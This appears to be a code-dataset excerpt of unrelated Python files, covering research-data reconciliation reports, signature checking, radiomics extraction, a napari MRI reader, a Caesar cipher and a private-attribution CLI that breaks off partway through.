content stringlengths 5 1.05M |
|---|
#!/usr/bin/env python3
from reporter.core import SqlReport
from reporter.connections import get_redcap_link, RedcapInstance
from reporter.uhl_reports.civicrm import get_case_link
from reporter.emailing import (
RECIPIENT_IT_DWH
)
STUDY_NUMBERS_SQL = '''
WITH c (StudyNumber, civicrm_case_id, civicrm_contact_id) AS (
SELECT DISTINCT
SUBSTRING(StudyNumber, PATINDEX('%[^0]%', StudyNumber + '.'), LEN(StudyNumber)) StudyNumber,
civicrm_case_id,
civicrm_contact_id
FROM STG_CiviCRM.dbo.LCBRU_CaseDetails
WHERE case_type_id IN ({0})
AND case_status_id IN (
5, -- Recruited
8, -- Withdrawn
9, -- Excluded
10 -- Completed
)
AND i2b2ClinDataIntegration.dbo.IsNullOrEmpty(StudyNumber) = 0
), r (StudyNumber, project_id) AS (
SELECT DISTINCT
SUBSTRING(record, PATINDEX('%[^0]%', record + '.'), LEN(record)) StudyNumber,
project_id
FROM {2}.redcap_data
WHERE project_id IN ({1})
AND i2b2ClinDataIntegration.dbo.IsNullOrEmpty(record) = 0
)
'''
class CivicrmNotInRedcap(SqlReport):
def __init__(
self,
case_type_ids,
redcap_project_ids,
recipients=[RECIPIENT_IT_DWH],
schedule=None,
redcap_instance=None,
):
if redcap_instance is None:
redcap_instance = RedcapInstance.internal()
self.redcap_instance = redcap_instance
super().__init__(
introduction=("The following participants have "
"are recruited in CiviCrm, but do not have "
"a record in REDCap"),
recipients=recipients,
sql=STUDY_NUMBERS_SQL.format(
', '.join(['%s'] * len(case_type_ids)),
', '.join(['%s'] * len(redcap_project_ids)),
redcap_instance['staging_database'],
) + '''
SELECT
StudyNumber,
civicrm_case_id,
civicrm_contact_id
FROM c
WHERE c.StudyNumber NOT IN (
SELECT StudyNumber
FROM r
)
''',
parameters=(*case_type_ids, *redcap_project_ids)
)
def get_report_line(self, row):
return '- {}\r\n'.format(
get_case_link(
row['StudyNumber'] or 'Click Here',
row['civicrm_case_id'],
row['civicrm_contact_id'],
))
class RedcapNotInCiviCrm(SqlReport):
def __init__(
self,
case_type_ids,
redcap_project_ids,
recipients=[RECIPIENT_IT_DWH],
schedule=None,
redcap_instance=None,
):
if redcap_instance is None:
redcap_instance = RedcapInstance.internal()
self.redcap_instance = redcap_instance
super().__init__(
introduction=("The following participants "
"are recruited in REDCap, but do not have "
"a record in CiviCRM"),
recipients=recipients,
sql=STUDY_NUMBERS_SQL.format(
', '.join(['%s'] * len(case_type_ids)),
', '.join(['%s'] * len(redcap_project_ids)),
redcap_instance['staging_database'],
) + '''
SELECT
StudyNumber,
project_id
FROM r
WHERE r.StudyNumber NOT IN (
SELECT StudyNumber
FROM c
)
''',
parameters=(*case_type_ids, *redcap_project_ids)
)
def get_report_line(self, row):
return '- {}\r\n'.format(
self.redcap_instance['link_generator'](
row['StudyNumber'] or 'Click Here',
row['project_id'],
row['StudyNumber'],
))
|
import subprocess
import progressbar
def cigntool_check_files(files):
print('--== PHASE 1 ==--')
print("Checking files for digital signature")
unver_files = []
vered = 0
f = 0
pb = progressbar.ProgressBar(maxval=len(files), widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.SimpleProgress()])
pb.start()
for file in files:
process = subprocess.run(['signtool', 'verify', '/pa', file], stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
if process.returncode == 1:
unver_files.append(file)
else:
vered = vered + 1
f = f + 1
pb.update(f)
pb.finish()
print("Successfully verified {} files. Remaining {}".format(vered, len(unver_files)))
return unver_files
|
"""
The ``asyncpg`` integration traces database requests made using connection
and cursor objects.
Enabling
~~~~~~~~
The integration is enabled automatically when using
:ref:`ddtrace-run<ddtracerun>` or :func:`patch_all()<ddtrace.patch_all>`.
Or use :func:`patch()<ddtrace.patch>` to manually enable the integration::
from ddtrace import patch
patch(asyncpg=True)
Global Configuration
~~~~~~~~~~~~~~~~~~~~
.. py:data:: ddtrace.config.asyncpg['service']
The service name reported by default for asyncpg connections.
This option can also be set with the ``DD_ASYNCPG_SERVICE``
environment variable.
Default: ``postgres``
Instance Configuration
~~~~~~~~~~~~~~~~~~~~~~
Service
^^^^^^^
To configure the service name used by the asyncpg integration on a per-instance
basis use the ``Pin`` API::
import asyncpg
from ddtrace import Pin
conn = asyncpg.connect("postgres://localhost:5432")
Pin.override(conn, service="custom-service")
"""
from ...internal.utils.importlib import require_modules
required_modules = ["asyncpg"]
with require_modules(required_modules) as missing_modules:
if not missing_modules:
from .patch import patch
from .patch import unpatch
__all__ = [
"patch",
"unpatch",
]
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("PAT")
process.MessageLogger = cms.Service(
"MessageLogger",
categories = cms.untracked.vstring('info', 'debug','cout')
)
process.options = cms.untracked.PSet(
Rethrow = cms.untracked.vstring('ProductNotFound')
)
# source
process.source = cms.Source("PoolSource",
#fileNames = cms.untracked.vstring('rfio:/castor/cern.ch/user/r/rompotis/RedigiSummer08RootTrees/WenuRedigi_RECO_SAMPLE.root')
fileNames = cms.untracked.vstring(
'file:zee_Summer09-MC_31X_V3_AODSIM_v1_AODSIM.root'
)
)
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
## Load additional processes
process.load("Configuration.StandardSequences.Geometry_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
## global tags:
#process.GlobalTag.globaltag = cms.string('MC_31X_V5::All')
process.GlobalTag.globaltag = cms.string('STARTUP31X_V4::All')
process.load("Configuration.StandardSequences.MagneticField_cff")
################################################################################################
### P r e p a r a t i o n o f t h e P A T O b j e c t s f r o m A O D ###
################################################################################################
## pat sequences to be loaded:
process.load("CommonTools.ParticleFlow.PF2PAT_cff")
process.load("PhysicsTools.PatAlgos.patSequences_cff")
process.load("PhysicsTools.PatAlgos.triggerLayer1.triggerProducer_cff")
##
#
# for ecal isolation: set the correct name of the ECAL rechit collection
#
process.eleIsoDepositEcalFromHits.ExtractorPSet.barrelEcalHits = cms.InputTag("reducedEcalRecHitsEB", "", "RECO")
process.eleIsoDepositEcalFromHits.ExtractorPSet.endcapEcalHits = cms.InputTag("reducedEcalRecHitsEE", "", "RECO")
#
#
process.eidRobustHighEnergy.reducedBarrelRecHitCollection = cms.InputTag("reducedEcalRecHitsEB", "", "RECO")
process.eidRobustHighEnergy.reducedEndcapRecHitCollection = cms.InputTag("reducedEcalRecHitsEE", "", "RECO")
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
## CHOICE OF THE HLT PATH this section is not used from PAT
##
## Define here as string the names of the triggers only once
## please consult the table of the available triggers at the end of this file
# trigger menu selection
##
#process.patTrigger.processName = cms.string(HLT_process_name)
#process.patTriggerMatcher = cms.Sequence(process.patTriggerElectronMatcher)
#process.electronTriggerMatchHltElectrons.pathNames = cms.vstring(HLT_path_name)
#process.patTriggerMatchEmbedder = cms.Sequence(process.cleanLayer1ElectronsTriggerMatch)
#process.patTriggerSequence = cms.Sequence(process.patTrigger*process.patTriggerMatcher*
# process.patTriggerMatchEmbedder)
##
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
## MET creation <=== WARNING: YOU MAY WANT TO MODIFY THIS PART OF THE CODE %%%%%%%%%%%%%
## specify the names of the MET collections that you need here %%%%
## #%%
## if you don't specify anything the default MET is the raw Calo MET #%%
process.layer1RawCaloMETs = process.layer1METs.clone( #%%
metSource = cms.InputTag("met","","RECO"),
addTrigMatch = cms.bool(False),
addMuonCorrections = cms.bool(False),
addGenMET = cms.bool(False),
)
## specify here what you want to have on the plots! <===== MET THAT YOU WANT ON THE PLOTS %%%%%%%
myDesiredMetCollection = 'layer1RawCaloMETs'
## modify the sequence of the MET creation: #%%
process.makeLayer1METs = cms.Sequence(process.patMETCorrections * process.layer1METs *
process.layer1RawCaloMETs)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
## modify the final pat sequence: keep only electrons + METS (muons are needed for met corrections)
process.allLayer1Objects = cms.Sequence(process.makeAllLayer1Electrons+process.makeAllLayer1Muons+process.makeLayer1METs)
process.selectedLayer1Objects = cms.Sequence(process.selectedLayer1Electrons+process.selectedLayer1Muons)
process.cleanLayer1Objects = cms.Sequence(process.cleanLayer1Muons*process.cleanLayer1Electrons)
process.countLayer1Objects = cms.Sequence(process.countLayer1Electrons+process.countLayer1Muons)
process.patDefaultSequence = cms.Sequence(process.allLayer1Objects * process.selectedLayer1Objects *
process.cleanLayer1Objects*process.countLayer1Objects
)
## ################################################################################
##
## the filter to select the candidates from the data samples
##
## WARNING: you may want to modify this item: T R I G G E R S E L E C T I O N
HLT_process_name = "HLT8E29" # options: HLT or HLT8E29
# trigger path selection
HLT_path_name = "HLT_Ele10_LW_L1R"
# trigger filter name
HLT_filter_name = "hltL1NonIsoHLTNonIsoSingleElectronLWEt10PixelMatchFilter"
#
process.zeeFilter = cms.EDFilter('ZeeCandidateFilter',
# cuts
ETCut = cms.untracked.double(20.),
METCut = cms.untracked.double(0.),
# trigger
triggerCollectionTag = cms.untracked.InputTag("TriggerResults","",HLT_process_name),
triggerEventTag = cms.untracked.InputTag("hltTriggerSummaryAOD","",HLT_process_name),
hltpath = cms.untracked.string(HLT_path_name),
hltpathFilter = cms.untracked.InputTag(HLT_filter_name,"",HLT_process_name),
electronMatched2HLT = cms.untracked.bool(True),
electronMatched2HLT_DR = cms.untracked.double(0.2),
# electrons and MET
electronCollectionTag = cms.untracked.InputTag("selectedLayer1Electrons","","PAT"),
metCollectionTag = cms.untracked.InputTag(myDesiredMetCollection,"","PAT")
)
####################################################################################
##
## the Z selection that you prefer
selection_a2 = cms.PSet (
trackIso_EB = cms.untracked.double(7.2),
ecalIso_EB = cms.untracked.double(5.7),
hcalIso_EB = cms.untracked.double(8.1),
sihih_EB = cms.untracked.double(0.01),
dphi_EB = cms.untracked.double(1000.),
deta_EB = cms.untracked.double(0.0071),
hoe_EB = cms.untracked.double(1000),
trackIso_EE = cms.untracked.double(5.1),
ecalIso_EE = cms.untracked.double(5.0),
hcalIso_EE = cms.untracked.double(3.4),
sihih_EE = cms.untracked.double(0.028),
dphi_EE = cms.untracked.double(1000.),
deta_EE = cms.untracked.double(0.0066),
hoe_EE = cms.untracked.double(1000.)
)
selection_inverse = cms.PSet (
trackIso_EB_inv = cms.untracked.bool(True),
trackIso_EE_inv = cms.untracked.bool(True)
)
####################################################################################
##
## and the plot creator
process.plotter = cms.EDAnalyzer('ZeePlots',
selection_a2,
zeeCollectionTag = cms.untracked.InputTag("zeeFilter","selectedZeeCandidates","PAT")
)
process.p = cms.Path(process.patDefaultSequence +process.zeeFilter + process.plotter)
|
#!/usr/bin/env python
import unittest
from ternip.formats.gate import GateDocument
from ternip.timex import Timex
class GateDocumentTest(unittest.TestCase):
def test_get_sents(self):
t = GateDocument("""This POS B 20101010
is POS I
a POS I
sentence POS I
. . I
And POS B
a POS I
second POS I
sentence POS I
. POS I
Outside POS O""")
self.assertEqual(t.get_sents(), [[('This', 'POS', set()), ('is', 'POS', set()), ('a', 'POS', set()), ('sentence', 'POS', set()), ('.', '.', set())], [('And', 'POS', set()), ('a', 'POS', set()), ('second', 'POS', set()), ('sentence', 'POS', set()), ('.', 'POS', set()), ], [('Outside', 'POS', set())]])
def test_get_dct_sents(self):
t = GateDocument("""This POS B 20101010
is POS I
a POS I
sentence POS I
. . I
And POS B
a POS I
second POS I
sentence POS I
. POS I
Outside POS O""")
self.assertEqual(t.get_dct_sents(), [[('20101010', 'DCT', set())]])
def test_reconcile_sents(self):
d = GateDocument("""This POS B 20101010
is POS I
a POS I
sentence POS I
. . I
And POS B
a POS I
second POS I
sentence POS I
. POS I
Outside POS O""")
t = Timex(id=1)
d.reconcile([[('This', 'POS', set()), ('is', 'POS', set()), ('a', 'POS', set([t])), ('sentence', 'POS', set([t])), ('.', '.', set())], [('And', 'POS', set()), ('a', 'POS', set()), ('second', 'POS', set()), ('sentence', 'POS', set()), ('.', 'POS', set()), ], [('Outside', 'POS', set())]])
self.assertEqual(str(d), """This
is
a id=t1
sentence t1
.
And
a
second
sentence
.
Outside
""")
def test_reconcile_sents_attrs(self):
t1 = Timex(id=1, type='date')
t2 = Timex(id=2)
t3 = Timex(id=3)
t1.value = "20100710"
t1.mod = "BEFORE"
t1.freq = "1M"
t1.comment = "Test"
t1.granuality = "1D"
t1.non_specific = True
t1.quant = 'EVERY'
t1.temporal_function = True
t1.document_role = 'MODIFICATION_TIME'
t1.begin_timex = t1
t1.end_timex = t2
t1.context = t3
d = GateDocument("""This POS B 20101010
is POS I
a POS I
sentence POS I
. . I
And POS B
a POS I
second POS I
sentence POS I
. POS I
Outside POS O""")
d.reconcile([[('This', 'POS', set()), ('is', 'POS', set()), ('a', 'POS', set([t1])), ('sentence', 'POS', set([t1])), ('.', '.', set())], [('And', 'POS', set()), ('a', 'POS', set()), ('second', 'POS', set()), ('sentence', 'POS', set()), ('.', 'POS', set()), ], [('Outside', 'POS', set())]])
self.assertEqual(str(d), """This
is
a id=t1,value=20100710,type=DATE,mod=BEFORE,freq=1M,quant=EVERY,temporalFunction=true,functionInDocument=MODIFICATION_TIME,beginPoint=t1,endPoint=t2,anchorTimeID=t3
sentence t1
.
And
a
second
sentence
.
Outside
""") |
import csv
import logging
import os
import SimpleITK as sitk
import numpy as np
import radiomics
from radiomics import featureextractor
from filelock import FileLock
from scipy import ndimage
from random import randint
'''
This file contains functions which interact with the Pyradiomics library.
Frank te Nijenhuis 2020
'''
# These constants are used by the logger to switch verbosity levels.
HI_VERBOSITY = 10
LO_VERBOSITY = 40
def setup_logger(log_path):
radiomics.setVerbosity(LO_VERBOSITY)
# Get pyradiomics logger, loglevel DEBUG
logger = radiomics.logger
logger.setLevel(logging.ERROR)
# Set up the handler to write out all log entries to a file
handler = logging.FileHandler(filename=log_path, mode='w')
formatter = logging.Formatter("%(levelname)s:%(name)s: %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
def ROI_sampling(mask: sitk.Image) -> sitk.Image:
"""
Clips the default mask using a standard area, overcoming the area dependence of certain first order measures such as
Shannon entropy.
"""
# The original type is float64, we convert to int32
discretized_mask = sitk.Cast(mask, sitk.sitkUInt32)
output = sitk.Image(mask.GetSize(), sitk.sitkUInt32)
# For each slice in the mask we try to find a suitable region
for z in np.arange(discretized_mask.GetDepth()):
# Extract a slice from the mask
img = discretized_mask[:, :, z.item()]
img_arr = sitk.GetArrayFromImage(img)
# Erode the mask using a 20 x 20 box
img_arr_eroded = ndimage.binary_erosion(img_arr, structure=np.ones((20, 20)))
out_arr = sitk.GetArrayFromImage(output[:, :, z.item()])
# Pick a random location within the eroded mask, this will be the new center of our window
indices = np.nonzero(img_arr_eroded)
# Check if there are any indices in the tuple
if len(indices[0]):
random_index = randint(0, len(indices[0]) - 1)
# Create a new image of the intersect of the mask with the selected window
c_x = indices[0][random_index]
c_y = indices[1][random_index]
out_arr[c_x - 10:c_x + 10, c_y - 10:c_y + 10] = img_arr[c_x - 10:c_x + 10, c_y - 10:c_y + 10]
# Paste the new image into the output image
img_vol = sitk.JoinSeries(sitk.GetImageFromArray(out_arr))
output = sitk.Paste(output, img_vol, img_vol.GetSize(), destinationIndex=[0, 0, z.item()])
output.CopyInformation(mask)
return output
def initialize_extractor(parameters: str, logger: radiomics.logger) -> featureextractor.RadiomicsFeatureExtractor:
# Initialize feature extractor, if inputfile is valid
if os.path.isfile(parameters):
extractor = radiomics.featureextractor.RadiomicsFeatureExtractor(parameters)
else:
logger.warning('Parameter file not found, use hardcoded settings instead')
settings = {'binWidth': 25, 'resampledPixelSpacing': None, 'interpolator': sitk.sitkBSpline,
'enableCExtensions': True}
extractor = radiomics.featureextractor.RadiomicsFeatureExtractor(**settings)
logger.info("Parameters loaded")
return extractor
def extract_features(files: list, extractor: radiomics.featureextractor.RadiomicsFeatureExtractor, output_csv,
lab_val: int = 1, logger: radiomics.logger = None):
"""
Reads a tuple of file and mask, extracts features
"""
# Do this to handle parallel processing where we can't pass the logger
if not logger:
info = warning = print
else:
info = logger.info
warning = logger.warning
image, mask, label = files
# TODO Efficiently extract for all labels in mask
if label:
# Label defined in the input file takes precedence over the argument
info('Overriding manual label (-b) parameter, was ' + str(lab_val) + ', now ' + label)
lab_val = int(label)
try:
result = extractor.execute(image, mask, label=lab_val)
# write to file
except ValueError as err:
warning("Unable to extract features, error: {}".format(err))
return None
store_row(image, mask, result, output_csv, logger)
# info('Extraction successful: \t' + image + '\t' + mask)
return result
def store_row(img, msk, features, out_path, logger):
# Store the calculated features in a csv file in default pyradiomics batch output style
if not features:
logger.warning('Can\'t store output, no features to store, continuing')
return
try:
with FileLock(out_path + '.lock'):
out_file = open(out_path, 'a')
csv_columns = ["Image", "Mask", *list(features.keys())]
writer = csv.DictWriter(out_file, fieldnames=csv_columns)
if os.path.getsize(os.path.join(os.getcwd(), out_path)) == 0:
# File is empty, we can write the header
writer.writeheader()
features['Image'] = img
features['Mask'] = msk
writer.writerow(features)
out_file.flush()
except ValueError as err:
print(err)
def sample_masks(file_list):
for (_, mask_name, _) in file_list:
mask = sitk.Cast(sitk.ReadImage(mask_name), sitk.sitkInt32)
# Hardcoded the levels right now, these correspond to the labels within the masks
low = 1
high = 5
for lvl in np.arange(low, high + 1):
tmp_mask = sitk.GetArrayFromImage(mask)
tmp_mask[tmp_mask != lvl] = 0
tmp_mask_img = sitk.GetImageFromArray(tmp_mask)
tmp_mask_img.CopyInformation(mask)
updated_mask = ROI_sampling(tmp_mask_img)
mask_prefix, mask_extension = os.path.splitext(mask_name)
sitk.WriteImage(updated_mask, mask_prefix + "_sampled_" + str(lvl) + mask_extension) |
"""
This is a simple napari plugin for 3D-viewing of nifty files
(.nii.gz) - a common MRI file format.
"""
from napari_plugin_engine import napari_hook_implementation
@napari_hook_implementation
def napari_get_reader(path):
if isinstance(path, list):
path = path[0]
if not path.endswith(".nii.gz"):
return None
return MRI_reader
def MRI_reader(path):
"""Given a single path, returns a tuple [(data, metadata)]"""
import numpy as np
import nibabel as nib
# Read a .nii file and header info including voxel spacing
img_file = nib.load(path)
img_data = img_file.get_fdata()
# sagittal view
img_sag_reversed = (img_data[:, :, ::-1])
img_sag_final = (np.transpose(img_sag_reversed, (0, 2, 1)))
# save the sagittal MRI file and view other planes (coronal and axial)
# by the roll-dimension button
data = img_sag_final
# Read and store the image header information
metadata = {
name: img_file.header[name]
for name in img_file.header.keys()
}
params = {
"metadata": metadata,
}
return [(data, params)]
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
from ax.utils.common.testutils import TestCase
class InitTest(TestCase):
def testInitFiles(self) -> None:
for root, _dirs, files in os.walk("./ax/ax", topdown=False):
self.assertTrue(
"__init__.py" in files,
"directory " + root + " does not contain a .__init__.py file",
)
|
#! /usr/bin/env python3
# -*- coding:utf-8 -*-
###############################################################
# kenwaldek MIT-license
#
# Title: testing oled Version: 1.0
# Date: 29-01-2017 Language: python3
# Description: testing an oled display with i2c on rpi
#
###############################################################
# Share if you care, do something
from luma.core.serial import i2c
from luma.core.render import canvas
from luma.oled.device import ssd1306, ssd1325, ssd1331, sh1106
serial = i2c(port=1, address=0x3C)
device = ssd1306(serial, rotate=1)
# Box and text rendered in portrait mode
with canvas(device) as draw:
#draw.rectangle(device.bounding_box, outline="white", fill="black")
draw.text((10, 40), "Hello World", fill="white") |
#!/bin/bash
#coding=utf8
def getSequenceLi():
li = []
li.append({'_id': 'pubDictionaryId', 'c': 100})
li.append({'_id': 'transactionsId', 'c': 100})
li.append({'_id': 'demoId', 'c': 100})
li.append({'_id': 'actionTestId', 'c': 100})
li.append({'_id': 'pubReferenceLogId', 'c': 100})
li.append({'_id': 'currencyTypeId', 'c': 100})
li.append({'_id': 'billTypeId', 'c': 100})
li.append({'_id': 'billTypeParameterId', 'c': 100})
li.append({'_id': 'systemParameterId', 'c': 100})
li.append({'_id': 'taxTypeId', 'c': 100})
li.append({'_id': 'accountingPeriodId', 'c': 100})
li.append({'_id': 'providerTypeId', 'c': 100})
li.append({'_id': 'providerId', 'c': 100})
li.append({'_id': 'customerTypeId', 'c': 100})
li.append({'_id': 'customerId', 'c': 100})
li.append({'_id': 'measureUnitId', 'c': 100})
li.append({'_id': 'incomeTypeId', 'c': 100})
li.append({'_id': 'incomeItemId', 'c': 100})
li.append({'_id': 'articleId', 'c': 100})
li.append({'_id': 'articleTypeId', 'c': 100})
li.append({'_id': 'bankId', 'c': 100})
li.append({'_id': 'bankAccountId', 'c': 100})
li.append({'_id': 'bankAccountCurrencyTypeId', 'c': 100})
li.append({'_id': 'cashAccountId', 'c': 100})
li.append({'_id': 'balanceTypeId', 'c': 100})
li.append({'_id': 'payPactId', 'c': 100})
li.append({'_id': 'accountInitId', 'c': 100})
li.append({'_id': 'cashAccountInitId', 'c': 100})
li.append({'_id': 'bankAccountInitId', 'c': 100})
li.append({'_id': 'gatheringBillId', 'c': 100})
li.append({'_id': 'payBillId', 'c': 100})
li.append({'_id': 'accountInOutId', 'c': 100})
li.append({'_id': 'accountInOutItemId', 'c': 100})
li.append({'_id': 'bbsPostId', 'c': 100})
li.append({'_id': 'bbsPostReadId', 'c': 100})
li.append({'_id': 'accountInOutDisplayId', 'c': 100})
li.append({'_id': 'nullId', 'c': 100})
li.append({'_id': 'sysUserId', 'c': 100})
li.append({'_id': 'sysUnitId', 'c': 100})
li.append({'_id': 'sysStepId', 'c': 100})
li.append({'_id': 'lastSessionDataId', 'c': 100})
li.append({'_id': 'menuId', 'c': 100})
return li
|
"""
Function for encoding a rotational cipher (rot13),
also known as a Caesar cipher.
Args:
text: string of text to encoded
key: integer value for shifting Ciphertext
Returns:
encoded: the encoded text of the ciphers
Examples:
- ROT5 `omg` gives `trl`
- ROT0 `c` gives `c`
- ROT26 `Cool` gives `Cool`
- ROT13 `The quick brown fox` gives `Gur dhvpx oebja sbk`
"""
from string import ascii_lowercase
def rotate(text, key):
"Rotational or Caesar cipher encoding"
letters = ascii_lowercase
encoded = ''
for character in text:
if character.isalpha():
index = letters.index(character.lower()) + key
if index > 25:
index = index - 26
encoded_letter = letters[index]
if character.isupper():
encoded = encoded + encoded_letter.upper()
else:
encoded = encoded + encoded_letter
else:
encoded = encoded + character
return encoded
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
"""
CLI for running a Private Attribute study
Usage:
pa-coordinator create_instance <instance_id> --config=<config_file> --input_path=<input_path> --output_dir=<output_dir> --role=<pa_role> --num_pid_containers=<num_pid_containers> --num_mpc_containers=<num_mpc_containers> --num_files_per_mpc_container=<num_files_per_mpc_container> [--padding_size=<padding_size> --concurrency=<concurrency> --k_anonymity_threshold=<k_anonymity_threshold> --hmac_key=<base64_key>] [options]
pa-coordinator id_match <instance_id> --config=<config_file> [--server_ips=<server_ips> --dry_run] [options]
pa-coordinator prepare_compute_input <instance_id> --config=<config_file> [--dry_run --log_cost_to_s3] [options]
pa-coordinator compute_attribution <instance_id> --config=<config_file> --game=<game_name> --attribution_rule=<attribution_rule> --aggregation_type=<aggregation_type> [--server_ips=<server_ips> --dry_run --log_cost_to_s3] [options]
pa-coordinator aggregate_shards <instance_id> --config=<config_file> --game=<game_name> [--server_ips=<server_ips> --dry_run --log_cost_to_s3] [options]
pa-coordinator get_server_ips <instance_id> --config=<config_file> [options]
pa-coordinator get_instance <instance_id> --config=<config_file> [options]
pa-coordinator print_instance <instance_id> --config=<config_file> [options]
Options:
-h --help Show this help
--log_path=<path> Override the default path where logs are saved
--verbose Set logging level to DEBUG
"""
import logging
import os
from collections import defaultdict
from pathlib import Path, PurePath
from typing import Any, DefaultDict, Dict, List, Optional
import schema
from docopt import docopt
from fbpcp.entity.mpc_instance import MPCInstance
from fbpcp.service.container import ContainerService
from fbpcp.service.onedocker import OneDockerService
from fbpcp.service.mpc import MPCService
from fbpcp.service.storage import StorageService
from fbpcp.util import reflect, yaml
from fbpmp.onedocker_binary_config import OneDockerBinaryConfig
from fbpmp.onedocker_service_config import OneDockerServiceConfig
from fbpmp.pid.entity.pid_instance import PIDInstance, PIDProtocol
from fbpmp.pid.service.pid_service.pid import PIDService
from fbpmp.private_computation.entity.private_computation_instance import (
PrivateComputationInstance,
)
from fbpmp.private_computation.entity.private_computation_instance import (
PrivateComputationRole,
)
from fbpmp.private_attribution.service.private_attribution import (
PrivateAttributionService,
)
DEFAULT_HMAC_KEY: str = ""
DEFAULT_PADDING_SIZE: int = 4
DEFAULT_CONCURRENCY: int = 1
DEFAULT_K_ANONYMITY_THRESHOLD: int = 0
def _build_pa_service(
pa_config: Dict[str, Any], mpc_config: Dict[str, Any], pid_config: Dict[str, Any]
) -> PrivateAttributionService:
pa_instance_repository_config = pa_config["dependency"][
"PrivateComputationInstanceRepository"
]
repository_class = reflect.get_class(pa_instance_repository_config["class"])
repository_service = repository_class(
**pa_instance_repository_config["constructor"]
)
onedocker_binary_config_map = _build_onedocker_binary_cfg_map(
pa_config["dependency"]["OneDockerBinaryConfig"]
)
onedocker_service_config = _build_onedocker_service_cfg(
pa_config["dependency"]["OneDockerServiceConfig"]
)
container_service = _build_container_service(
pa_config["dependency"]["ContainerService"]
)
onedocker_service = _build_onedocker_service(
container_service, onedocker_service_config.task_definition
)
storage_service = _build_storage_service(pa_config["dependency"]["StorageService"])
return PrivateAttributionService(
repository_service,
_build_mpc_service(
mpc_config,
onedocker_service_config,
container_service,
storage_service
),
_build_pid_service(
pid_config,
onedocker_service,
storage_service,
onedocker_binary_config_map,
),
onedocker_service,
onedocker_binary_config_map,
storage_service,
)
def _build_container_service(config: Dict[str, Any]) -> ContainerService:
container_class = reflect.get_class(config["class"])
return container_class(**config["constructor"])
def _build_onedocker_service(
container_service: ContainerService,
task_definition: str,
) -> OneDockerService:
return OneDockerService(container_service, task_definition)
def _build_mpc_service(
config: Dict[str, Any],
onedocker_service_config: OneDockerServiceConfig,
container_service: ContainerService,
storage_service: StorageService,
) -> MPCService:
mpcinstance_repository_config = config["dependency"]["MPCInstanceRepository"]
repository_class = reflect.get_class(mpcinstance_repository_config["class"])
repository_service = repository_class(
**mpcinstance_repository_config["constructor"]
)
mpc_game_config = config["dependency"]["MPCGameService"]
pa_game_repo_config = mpc_game_config["dependency"][
"PrivateAttributionGameRepository"
]
pa_game_repo_class = reflect.get_class(pa_game_repo_config["class"])
pa_game_repo = pa_game_repo_class()
mpc_game_class = reflect.get_class(mpc_game_config["class"])
mpc_game_svc = mpc_game_class(pa_game_repo)
task_definition = onedocker_service_config.task_definition
return MPCService(
container_service,
storage_service,
repository_service,
task_definition,
mpc_game_svc,
)
def _build_onedocker_service_cfg(
onedocker_service_config: Dict[str, Any]
) -> OneDockerServiceConfig:
return OneDockerServiceConfig(**onedocker_service_config["constructor"])
def _build_onedocker_binary_cfg(
onedocker_binary_config: Dict[str, Any]
) -> OneDockerBinaryConfig:
return OneDockerBinaryConfig(**onedocker_binary_config["constructor"])
def _build_onedocker_binary_cfg_map(
onedocker_binary_configs: Dict[str, Dict[str, Any]]
) -> DefaultDict[str, OneDockerBinaryConfig]:
onedocker_binary_cfg_map = defaultdict(
lambda: _build_onedocker_binary_cfg(onedocker_binary_configs["default"])
)
for binary_name, config in onedocker_binary_configs.items():
onedocker_binary_cfg_map[binary_name] = _build_onedocker_binary_cfg(config)
return onedocker_binary_cfg_map
def get_mpc(config: Dict[str, Any], instance_id: str, logger: logging.Logger) -> None:
container_service = _build_container_service(
config["private_attribution"]["dependency"]["ContainerService"]
)
storage_service = _build_storage_service(
config["private_attribution"]["dependency"]["StorageService"]
)
mpc_service = _build_mpc_service(
config["mpc"],
_build_onedocker_service_cfg(config["private_attribution"]["dependency"]["OneDockerServiceConfig"]),
container_service,
storage_service
)
# calling update_instance here to get the newest container information
instance = mpc_service.update_instance(instance_id)
logger.info(instance)
def _build_pid_service(
pid_config: Dict[str, Any],
onedocker_service: OneDockerService,
storage_service: StorageService,
onedocker_binary_config_map: DefaultDict[str, OneDockerBinaryConfig],
) -> PIDService:
pidinstance_repository_config = pid_config["dependency"]["PIDInstanceRepository"]
repository_class = reflect.get_class(pidinstance_repository_config["class"])
repository_service = repository_class(
**pidinstance_repository_config["constructor"]
)
return PIDService(
onedocker_service,
storage_service,
repository_service,
onedocker_binary_config_map,
)
def _build_storage_service(config: Dict[str, Any]) -> StorageService:
storage_class = reflect.get_class(config["class"])
return storage_class(**config["constructor"])
def create_instance(
config: Dict[str, Any],
instance_id: str,
role: PrivateComputationRole,
input_path: str,
output_dir: str,
hmac_key: str,
num_pid_containers: int,
num_mpc_containers: int,
num_files_per_mpc_container: int,
logger: logging.Logger,
padding_size: int,
concurrency: int = DEFAULT_CONCURRENCY,
k_anonymity_threshold: int = DEFAULT_K_ANONYMITY_THRESHOLD,
) -> None:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
instance = pa_service.create_instance(
instance_id=instance_id,
role=role,
input_path=input_path,
output_dir=output_dir,
hmac_key=hmac_key,
num_pid_containers=num_pid_containers,
num_mpc_containers=num_mpc_containers,
num_files_per_mpc_container=num_files_per_mpc_container,
padding_size=padding_size,
concurrency=concurrency,
k_anonymity_threshold=k_anonymity_threshold,
logger=logger,
)
logger.info(instance)
def id_match(
